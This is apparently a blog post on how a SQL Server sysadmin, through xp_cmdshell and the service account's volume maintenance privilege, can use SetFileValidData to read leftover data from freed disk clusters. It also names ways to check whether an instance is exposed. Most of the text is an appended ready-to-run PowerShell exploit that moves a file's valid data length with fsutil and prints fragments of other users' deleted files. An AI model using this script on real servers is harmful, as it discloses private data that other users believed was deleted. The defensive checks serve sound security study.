Monday, January 1, 2018

SQL Server sysadmins can affect the host machine

Microsoft SQL Server ships with an xp_cmdshell extended stored procedure that spawns a Windows command shell and runs whatever command string it is given, under the SQL Server service account. It is disabled by default, but any member of the sysadmin role can turn it on with sp_configure. That service account looks roughly like a standard user, but it carries a couple of extra privileges. The relevant one is SeManageVolumePrivilege ("Perform volume maintenance tasks"), which SQL Server setup offers to grant (and many installations do) so that instant file initialization works, and which is what permits SetFileValidData, the API behind fsutil file setvaliddata. NTFS tracks a valid data length (VDL) for each file and returns zeros for any byte past it; a write beyond the VDL makes NTFS zero-fill the gap on disk first. SetFileValidData moves the VDL without that zeroing, so the clusters the file has just been allocated become readable with whatever they held before. An attacker who reaches sysadmin on such an instance can therefore read leftover data from the volume, including remnants of files deleted by other users, like so: create an empty file, extend its end of file to a large size without writing into it (SetEndOfFile, which is what FileStream.SetLength and fsutil file createnew do), set the valid data length to that size, and read the file back. PowerShell makes the first and last steps easy. To check whether an instance is exposed, look for SeManageVolumePrivilege in the output of whoami /priv run through xp_cmdshell, or, on SQL Server 2016 SP1 and later, at the instant_file_initialization_enabled column of sys.dm_server_services.
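The procedure above as a single script, added here as an example and not part of the original post. It first checks whether the current token holds SeManageVolumePrivilege, then extends a scratch file without writing into it, moves the valid data length to end of file with fsutil, and reports how much of the read-back is non-zero. The scratch path and size are assumptions; run it on a test machine you own, either directly or through xp_cmdshell as the SQL Server service account.

```powershell
# Added example, not from the original post. Reproduces the valid-data-length
# read-back described above on a scratch volume and first checks whether the
# current token holds the privilege SetFileValidData needs. Path and size are
# assumptions; run it under the SQL Server service account (for example via
# xp_cmdshell 'powershell -File ...') on a test machine you own.
param(
    [string]$Path = 'C:\Temp\vdl-probe.bin',   # assumed scratch file on an NTFS volume
    [long]$Size   = 64MB                        # assumed; more bytes = more freed clusters exposed
)

# 1. SetFileValidData fails with ERROR_PRIVILEGE_NOT_HELD unless the token
#    holds SeManageVolumePrivilege ("Perform volume maintenance tasks").
$priv = whoami /priv | Select-String 'SeManageVolumePrivilege'
if (-not $priv) { throw 'SeManageVolumePrivilege not held; SetFileValidData will be denied' }
$priv.Line.Trim()

# 2. Create the file and extend its end-of-file *without* writing into it.
#    SetLength calls SetEndOfFile: clusters are allocated, the valid data
#    length (VDL) stays at 0 and reads return zeros. Writing a byte at the
#    far end instead would make NTFS zero-fill the gap and defeat the test.
$dir = Split-Path -Parent $Path
if (-not (Test-Path $dir)) { New-Item -ItemType Directory -Path $dir | Out-Null }
$fs = [System.IO.File]::Open($Path, [System.IO.FileMode]::Create, [System.IO.FileAccess]::ReadWrite)
$fs.SetLength($Size)
$fs.Close()

# 3. Move the VDL to end-of-file. fsutil calls SetFileValidData; nothing is
#    zeroed, so the allocated clusters now read back with their old contents.
fsutil file setvaliddata $Path $Size
if ($LASTEXITCODE -ne 0) {
    Remove-Item $Path
    throw "fsutil setvaliddata failed with exit code $LASTEXITCODE"
}

# 4. Read it back. ISO-8859-1 maps every byte to exactly one char, so plain
#    string operations give a fast non-zero count and printable-ASCII search.
$bytes   = [System.IO.File]::ReadAllBytes($Path)
$text    = [System.Text.Encoding]::GetEncoding(28591).GetString($bytes)
$nonZero = $text.Replace("`0", '').Length
'{0:N0} of {1:N0} bytes are non-zero (leftover contents of freed clusters)' -f $nonZero, $bytes.Length

# 5. Show the first printable runs so the leak is visible; on a busy volume
#    these are typically fragments of logs, documents or other databases.
[regex]::Matches($text, '[\x20-\x7e]{16,}') | Select-Object -First 20 -ExpandProperty Value

Remove-Item $Path
```

If step 1 throws, the service account was not granted the volume maintenance right and the rest of the trick does not apply; if step 3 fails on an otherwise privileged account, check that the scratch file is on NTFS and is not sparse, compressed or encrypted, since SetFileValidData rejects those.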
